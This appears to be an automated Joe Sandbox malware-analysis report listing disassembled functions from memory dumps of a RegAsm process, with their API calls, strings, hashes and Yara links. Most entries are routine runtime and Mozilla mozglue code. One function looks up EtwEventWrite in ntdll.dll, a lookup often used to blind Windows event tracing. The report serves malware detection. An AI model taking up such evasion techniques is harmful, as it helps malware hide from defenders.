Opcode Fuzzy Hash: d28e955d17662032dc8010af9f3d51694746577a77f4fdc98653eb75e8188f75
Instruction Fuzzy Hash: 82015E717052199BCB10DFA6DC48B5FBBFCFF4A665B501528F949D7600DB30A900CBA0

Function 6C05E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C05E577
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05E584
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C05E8A6

Strings

MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C05E722, 6C05E750, 6C05E7A2
MOZ_PROFILER_STARTUP, xrefs: 6C05E5A1, 6C05E5CC, 6C05E5FF, 6C05E62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C05E655
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C05E777
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C05E826, 6C05E850

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 42c17474c93d11cf7bd8548428c2cce1d1f4fb2070a3475d00b87ed94598db07
Instruction ID: b118920dbd7e0a3215c0e71a5bc8c7c9236020f84384d00bf8db932e55861741
Opcode Fuzzy Hash: 42c17474c93d11cf7bd8548428c2cce1d1f4fb2070a3475d00b87ed94598db07
Instruction Fuzzy Hash: 9111C431604258DFCB109F15C448B6EBBF8FB89329F411519F89647750DB74A815CBD1

Function 0040F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F282

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

std::_Xinvalid_argument.LIBCPMT ref: 0040F28D

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Strings

string too long, xrefs: 0040F27D
invalid string position, xrefs: 0040F288

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction ID: e6539817a9f8634559db26b0b382dc9566da10c2029d1fc652b1cb6cacdddcbf
Opcode Fuzzy Hash: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction Fuzzy Hash: 55D012B5A4020C7BCB04E79AE816ACDBAE99B58714F20016FB616D3641EAB8A6004569

Function 00411D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
HeapAlloc.KERNEL32(00000000), ref: 00411D73
wsprintfW.USER32 ref: 00411D84

Strings

%hs, xrefs: 00411D7E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction ID: 516a0af99a9d3ed9a850d6bfca40a0a85ae49b58000b6b42a5d70a6c01262027
Opcode Fuzzy Hash: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction Fuzzy Hash: F2D0A73134031477C61027D4BC0DF9A3F2CDB067A2F001130FA0DD6151C96548144BDD

Function 004013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
ReleaseDC.USER32(00000000,00000000), ref: 00401416

Strings

DISPLAY, xrefs: 004013FD

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction ID: 9bbdd1ee4896165f6ac39e3e5efd8c25d27bca58a6bb0b57e2a538c7cae0429d
Opcode Fuzzy Hash: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction Fuzzy Hash: C9D012353C030477E1781B50BC5FF1A2934D7C5F02F201124F312580D046A41402963E

Function 004018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB

Strings

EtwEventWrite, xrefs: 004018C5
ntdll.dll, xrefs: 004018B5

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: EtwEventWrite$ntdll.dll
API String ID: 1646373207-1851843765
Opcode ID: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction ID: fa0301676ac4a0b35d6f0bad7f9db5a069fcd374a286a1e4a3065c0da922a8bc
Opcode Fuzzy Hash: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction Fuzzy Hash: 84B09B7078020097CD1467756D5DF07766566457027506165A645D0160D77C5514551D

Function 6C060C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C060CD5

Part of subcall function 6C04F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C04F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C060D40
free.MOZGLUE ref: 6C060DCB

Part of subcall function 6C035E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C035EDB
Part of subcall function 6C035E90: memset.VCRUNTIME140(6C077765,000000E5,55CCCCCC), ref: 6C035F27
Part of subcall function 6C035E90: LeaveCriticalSection.KERNEL32(?), ref: 6C035FB2

free.MOZGLUE ref: 6C060DDD
free.MOZGLUE ref: 6C060DF2

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 69cef5ecaea70dce44bc3904604b972a7ed822f254683ddf3395102d1e804bd5
Instruction ID: b32be7a546d7c4b8c28c279a14bb04c69cbae91f62dbc8e9d97eca04df7fd61e
Opcode Fuzzy Hash: 69cef5ecaea70dce44bc3904604b972a7ed822f254683ddf3395102d1e804bd5
Instruction Fuzzy Hash: 8141077594D7849BD720CF2AC04079AFBE5BF85618F508A2EE8D887B50D770A445CB82

Function 6C069120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C068242,?,00000000,?,6C05B63F), ref: 6C069188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C068242,?,00000000,?,6C05B63F), ref: 6C0691BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C068242,?,00000000,?,6C05B63F), ref: 6C0691EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C068242,?,00000000,?,6C05B63F), ref: 6C069200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C068242,?,00000000,?,6C05B63F), ref: 6C069219

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: baea5d3da8dd8fa980315c40dd7aa76664393a7b37d300d1201dcfa23e5c7650
Instruction ID: 4feae3f62566f59e98b7a2f15d3605fc3210a8286101504fea5f70c97cf01ba5
Opcode Fuzzy Hash: baea5d3da8dd8fa980315c40dd7aa76664393a7b37d300d1201dcfa23e5c7650
Instruction Fuzzy Hash: C8312131A016068BEB00DF69DC4876A73E9FF81714F614629D956DBE40EB31E905CBA1

Function 6C050800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C09E7DC), ref: 6C050838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C05084C
EnterCriticalSection.KERNEL32(?), ref: 6C0508AF
LeaveCriticalSection.KERNEL32(?), ref: 6C0508BD
LeaveCriticalSection.KERNEL32(6C09E7DC), ref: 6C0508D5

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: ee842c4897442f022a95ac65e6046dbb19df7fd96124825d8d1588ccb5c71974
Instruction ID: 7d7b421f6d062387f6bb32632c8b3773a6f8b986a9642bacd402670acde7babe
Opcode Fuzzy Hash: ee842c4897442f022a95ac65e6046dbb19df7fd96124825d8d1588ccb5c71974
Instruction Fuzzy Hash: 0821B031B092099BEF048F65D944BBE73F9BF4571CF940528D519A7A80DF31A9548BD0

Function 6C06CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C05DA31,00100000,?,?,00000000,?), ref: 6C06CDA4

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

Part of subcall function 6C06D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C06CDBA,00100000,?,00000000,?,6C05DA31,00100000,?,?,00000000,?), ref: 6C06D158
Part of subcall function 6C06D130: InitializeConditionVariable.KERNEL32(00000098,?,6C06CDBA,00100000,?,00000000,?,6C05DA31,00100000,?,?,00000000,?), ref: 6C06D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C05DA31,00100000,?,?,00000000,?), ref: 6C06CDC4

Part of subcall function 6C067480: ReleaseSRWLockExclusive.KERNEL32(?,6C0715FC,?,?,?,?,6C0715FC,?), ref: 6C0674EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C05DA31,00100000,?,?,00000000,?), ref: 6C06CECC

Part of subcall function 6C02CA10: mozalloc_abort.MOZGLUE(?), ref: 6C02CAA2

Part of subcall function 6C05CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C06CEEA,?,?,?,?,00000000,?,6C05DA31,00100000,?,?,00000000), ref: 6C05CB57
Part of subcall function 6C05CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C05CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C06CEEA,?,?), ref: 6C05CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C05DA31,00100000,?,?,00000000,?), ref: 6C06D058

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: e61b4bfb63f5dbcb38aaa44a996b12e3eabbe2ec91243f34f4ca35ca35087924
Instruction ID: 8d3b6c52ac014f929491f1e044e89994050c3b8b1a8128948b43b469182b309a
Opcode Fuzzy Hash: e61b4bfb63f5dbcb38aaa44a996b12e3eabbe2ec91243f34f4ca35ca35087924
Instruction Fuzzy Hash: 4CD17F71A04B169FD708CF29C480B99F7E1BF89308F11862DE85987B11EB31B9A5CBC1

Function 6C021720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0217B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C0218EE
free.MOZGLUE(?), ref: 6C021911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C02194C

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: f254e7d279f4e66417234ca66ff79bb2aa39ce37b2fdb3e7ea9b12991c403ed1
Instruction ID: f55d9d9b94833b62333f83b6ef3ad1eb502ed7b591e6856710a93b5ca83a67ff
Opcode Fuzzy Hash: f254e7d279f4e66417234ca66ff79bb2aa39ce37b2fdb3e7ea9b12991c403ed1
Instruction Fuzzy Hash: 7181AD70A152059FCB08CF68D8C4AAEBBF1FF89314B04462DE855AB754DB35ED44CBA1

Function 6C035C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C035D40
EnterCriticalSection.KERNEL32(6C09F688), ref: 6C035D67
__aulldiv.LIBCMT ref: 6C035DB4
LeaveCriticalSection.KERNEL32(6C09F688), ref: 6C035DED

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: e848cc375024199d4dc7ca9b0b3880abef7ba5c46d864949b62558324a645b9e
Instruction ID: dfd2636ba2737b6ed63bb336d86820d9b18f916be83b97d1ec839222458a8b1e
Opcode Fuzzy Hash: e848cc375024199d4dc7ca9b0b3880abef7ba5c46d864949b62558324a645b9e
Instruction Fuzzy Hash: B0515F75E0022A8FCF18CF68C854BAEBBF9FB89304F199619D815A7760CB306D45CB90

Function 6C077170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C077250
EnterCriticalSection.KERNEL32(6C09F688), ref: 6C077277
__aulldiv.LIBCMT ref: 6C0772C4
LeaveCriticalSection.KERNEL32(6C09F688), ref: 6C0772F7

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: cbb5bb7fce680a487dcc1f1dd547974be7c56fe218098e282820d7abf2c17962
Instruction ID: 4c53916504632322956170f22cc10750c8163ec51366ac3b7d2c42fcfb78502e
Opcode Fuzzy Hash: cbb5bb7fce680a487dcc1f1dd547974be7c56fe218098e282820d7abf2c17962
Instruction Fuzzy Hash: D1515D71E002298FCF18CFACC850BAEB7FAFB89314F159619E915A7750CB306945CB90

Function 00425141 Relevance: 6.1, APIs: 4, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00425174
_siglookup.LIBCMT ref: 0042519B
DecodePointer.KERNEL32(00000000), ref: 004251F3
__lock.LIBCMT ref: 0042521A

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer__getptd_noexit__lock_siglookup
String ID:
API String ID: 2847133137-0
Opcode ID: 77078d732e8db2f3057a63753f0641dcf993b0cab592a8a63a99ae8e35919d99
Instruction ID: 069d67ce00bac186bc9f3ac32ad7eb6d288c3b8fedd6e0a8a483a63bcb82f46d
Opcode Fuzzy Hash: 77078d732e8db2f3057a63753f0641dcf993b0cab592a8a63a99ae8e35919d99
Instruction Fuzzy Hash: 37415C70F00A25DBCB289F68E884AADB6B0FF45315BA4416BE801A7391C73D9D51CF6D

Function 6C01CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C01CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C01CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C01CF4E

Strings

0, xrefs: 6C01CF30

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: c10490e034aa5d1c6ce0a8cadfb4a95ad6a2161c735eed0213cad5ffcd2da124
Instruction ID: 26f450869d0ed34c8569ca97de3bfdbeb68d42e930b1abea08804943ccf45588
Opcode Fuzzy Hash: c10490e034aa5d1c6ce0a8cadfb4a95ad6a2161c735eed0213cad5ffcd2da124
Instruction Fuzzy Hash: 6551E075A042568FCB04CF18C490BAAFBF5EF99300F1986ADD8595B752D731ED06CBA0

Function 6C0777D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0777FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C077829

Part of subcall function 6C04CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C0131A7), ref: 6C04CC45
Part of subcall function 6C04CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C0131A7), ref: 6C04CC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C07789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C0778CF

Part of subcall function 6C014DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C014E5A
Part of subcall function 6C014DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C014E97

